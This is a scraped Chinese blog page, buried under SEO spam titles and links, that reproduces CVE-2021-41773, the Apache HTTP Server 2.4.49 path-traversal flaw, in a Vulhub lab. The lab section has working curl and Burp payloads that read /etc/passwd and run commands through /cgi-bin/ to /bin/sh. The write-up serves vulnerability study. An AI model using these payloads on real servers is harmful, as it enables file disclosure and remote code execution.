当前位置: 首页 > news >正文

欧米茄官方手表seoapp推广

欧米茄官方手表,seoapp推广,怎么关闭网站安全检测,广州建站客服招聘感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞验证方式一 curl方式二 bp抓包 说明内容漏洞编号CVE-2021-41773漏洞名称Apache HTTP 路径穿越漏洞漏…

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

      • 1.1、漏洞描述
      • 1.2、漏洞等级
      • 1.3、影响版本
      • 1.4、漏洞复现
        • 1、基础环境
        • 2、漏洞验证
          • 方式一 curl
          • 方式二 bp抓包

说明内容
漏洞编号CVE-2021-41773
漏洞名称Apache HTTP 路径穿越漏洞
漏洞评级高危
影响范围2.4.49
漏洞描述在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件
修复方案

1.1、漏洞描述

Apache HTTP服务器项目致力于为现代操作系统(包括UNIX和Windows)开发和维护开源HTTP服务器。

在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果CGI脚本也为这些别名路径启用,则可以允许远程代码执行。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2021-41773


启动测试环境:

sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到

在这里插入图片描述

2、漏洞验证
方式一 curl

/icons/必须是现有目录

curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

在服务器上启用mods cgicgid后,此路径遍历漏洞将允许执行任意命令

curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

在这里插入图片描述

方式二 bp抓包
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id

在这里插入图片描述

http://www.khdw.cn/news/48344.html

相关文章:

  • 网站开发用什么开发工具好呢优化关键词的方法
  • 自助建网站的平台 数据库网页推广怎么收取费用
  • 建站平台取名字app联盟推广平台
  • 智慧团建官方网站登录seo排名工具给您好的建议下载官网
  • 网站空间域名免费武汉网站建设方案优化
  • 做网站应该注意seo和sem的区别是什么
  • 免费网站建设浩森宇特百度seo优化关键词
  • 嘉兴高端建站公司保健品的营销及推广方案
  • 广州市天河区建设局官方网站百度竞价一个月5000够吗
  • 国内网站建设推荐充电宝关键词优化
  • 楼盘网站开发百度信息流广告
  • dede手机网站模板下载陕西seo顾问服务
  • 做短视频的网站都有哪些市场营销手段有哪四种
  • 高德地图是中国的还是国外的手机优化大师为什么扣钱
  • 做平面vi网站百度一键安装
  • 在线教学的网站开发方案sem工作原理
  • 网站建设找刘贺稳营销专家广州seo技术外包公司
  • 医院如何做网站策划?seo云优化软件
  • 网站建设服务有哪些方面潍坊seo培训
  • 哪有做网站的成都最好的网站推广优化公司
  • 如何自建网站做外贸网站建设找哪家好
  • 便宜建网站杭州搜索引擎推广排名技术
  • 网站建设的客户怎么找网络营销优化推广
  • python+网站开发+prf百度地图客服人工电话
  • 做尽调需要用到的网站百度在线客服人工服务
  • 建设代练网站重庆seo排名优化
  • 免费网站建设排行表品牌宣传活动策划方案
  • 站酷网官网入口东莞网站推广哪里找
  • 那个网站是专门做机械设备百度官网
  • 网站安全防护措施网络软文是什么